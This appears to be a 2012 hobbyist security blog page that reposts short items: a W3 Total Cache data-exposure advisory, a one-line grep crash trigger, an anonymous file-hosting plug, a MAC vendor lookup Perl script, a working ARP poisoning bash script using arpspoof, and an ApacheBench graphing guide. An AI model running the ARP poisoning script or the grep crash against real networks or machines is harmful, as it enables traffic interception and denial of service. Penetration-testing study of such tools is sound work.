Dec 27, 2012

News: W3 Total Cache vulnerability allows hacker to steal password and db info

Jason A. Donenfeld has discovered a Critical vulnerability in one of the famous wordpress plugin "W3 Total Cache".  The plugin helps to improve the user experience of your site by improving your server performance, caching every aspect of your site.

The cache data is stored in public accessible directory, which means a malicious hacker can browse and download the password hashes and other database information.

He also published a simple shell script to identify and exploit this bug:
http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh

  

Source: http://www.ehackingnews.com/2012/12/w3-total-cache-vulnerability-allows.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

0day grep DoS

If you want the full detail of this vulnerability, please go to the Source. 

$ perl -e 'print "x"x(2**31)' | grep x > /dev/null
 
This checkin adds this text to the NEWS file:

+ grep no longer dumps core on lines whose lengths do not fit in 'int'.
+ (e.g., lines longer than 2 GiB on a typical 64-bit host).
+ Instead, grep either works as expected, or reports an error.
+ An error can occur if not enough main memory is available, or if the
+ GNU C library's regular expression functions cannot handle such long lines.
+ [bug present since "the beginning"] 

Source: http://www.openwall.com/lists/oss-security/2012/12/22/1


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Anonymously uploading or host files with Anonfiles.com

If you want to upload or host file with anonymously, try to use anonfiles.com :)

Upload your files anonymously and free on AnonFiles.com. the maximum file size is 500 MB. :)


Source: https://anonfiles.com/ 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 25, 2012

Howto: Perl Script For Lookup Mac Address.

Sometimes, when you want to lookup Mac Address that what the vendor of this Mac Address, so you can use many online tools for that. But if you want to work offline in Backtrack 4, you can use this script for that. This script was develop by Hawkje.

#!/usr/bin/perl
# MAC address OUI checker
# Thijs (Thice) Bosschert
# http://www.thice.nl
# v0.1 24-06-2010

# Print header
print "\n  MAC address OUI checker v0.1\n".
      "  by Thijs (Thice) Bosschert\n\n";

# Check if argument has been given
if (!$ARGV[0]) {
  &error;
}

# Removing seperators from MAC address and uppercase chars
$ARGV[0] =~ s/[:|\s|-]//g;
$ARGV[0] =~ y/a-z/A-Z/;

# Get OUI from MAC
if ($ARGV[0] =~ /^([0-9a-f]{6})/i) {
  $OUI = $1;
  print "  Checking OUI: ".$OUI."\n";
} else {
  &error;
}

# Open OUI file from aircrack-ng
open(FILE,"/usr/local/etc/aircrack-ng/airodump-ng-oui.txt");
  while (<FILE>) {
    ($checkoui,$company) = split(/\(hex\)/,$_);
    $checkoui =~ s/[-|\s]//g;
    # Check if OUI can be found in the list
    if ($OUI eq $checkoui) {
      $company =~ s/\t//g;
      # Output found OUI
      print "  Found OUI: ".$OUI." - ".$company."\n\n";
      exit;
    }
  }
close(FILE);

# Show if OUI was not found
print "  Could not find OUI: ".$OUI."\n\n";

# Error messages
sub error {
  print "  Error: No MAC address or OUI specified or could not recognize it.\n".
        "    Usage: perl OUI_lookup.pl <MAC/OUI>\n".
        "    MAC can be submitted as:\n".
        "       001122334455\n".
        "       00:11:22:33:44:55\n".
        "       00-11-22-33-44-55\n".
        "    OUI can be submitted as:\n".
        "       001122\n".
        "       00:11:22\n".
        "       00-11-22\n\n";
  exit;
}



Source: http://www.backtrack-linux.org/forums/showthread.php?t=29819

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 24, 2012

Howto: ARP Poisoning Shell Script By Pentestlab

#!/bin/bash
niccard=eth1
if [[ $EUID -ne 0 ]]; then
echo -e "\n\t\t\t33[1m 33[31m Script must be run as root! 33[0m \n"
echo -e "\t\t\t Example: sudo $0 \n"
exit 1
else
echo -e "\n33[1;32m#######################################"
echo -e "# ARP Poison Script #"
echo -e "#######################################"
echo -e " 33[1;31mCoded By:33[0m Travis Phillips"
echo -e " 33[1;31mDate Released:33[0m 03/27/2012"
echo -e " 33[1;31mWebsite:33[0m http://theunl33t.blogspot.com\n33[0m"
echo -n "Please enter target's IP: "
read victimIP
echo -n "Please enter Gateway's IP: "
read gatewayIP
echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
echo -e "\t\t--==[Targets]==--"
echo -e "\t\tTarget: $victimIP"
echo -e "\t\tGateway: $gatewayIP \n\n"
echo -e "[*] Enabling IP Forwarding \n"
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e "[*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &
fi



Source: http://pentestlab.wordpress.com/2012/12/22/arp-poisoning-script/ 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Benchmarks your web server with Apache Benchmarks

1. Apache Benchmarks
ab -k -n 50000 -c 200 -g gnuplot-output.txt http://target_ip
-k keep alive [Multiple requests within one HTTP session]
-n number of request
-c number of multiple request to perform at a time
-g gnuplot-file output

2. Create the png file to Benchmark display
$ gnuplot configfile

Example configfile
# output as png image
set terminal png

# save file to "benchmark.png"
set output "benchmark.png"

# graph a title
set title "ab -k -n 50000 -c 200"

# nicer aspect ratio for image size
set size 1,0.7

# y-axis grid
set grid y

# x-axis label
set xlabel "request"

# y-axis label
set ylabel "response time (ms)"

# plot data from "server1.txt" and "server2.txt" using column 9 with smooth sbezier lines
plot "server1.txt" using 9 smooth sbezier with lines title "server1:", \
     "server2.txt" using 9 smooth sbezier with lines title "server2:"


Source: http://www.kutukupret.com/2011/05/10/graphing-apachebench-results-using-gnuplot/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |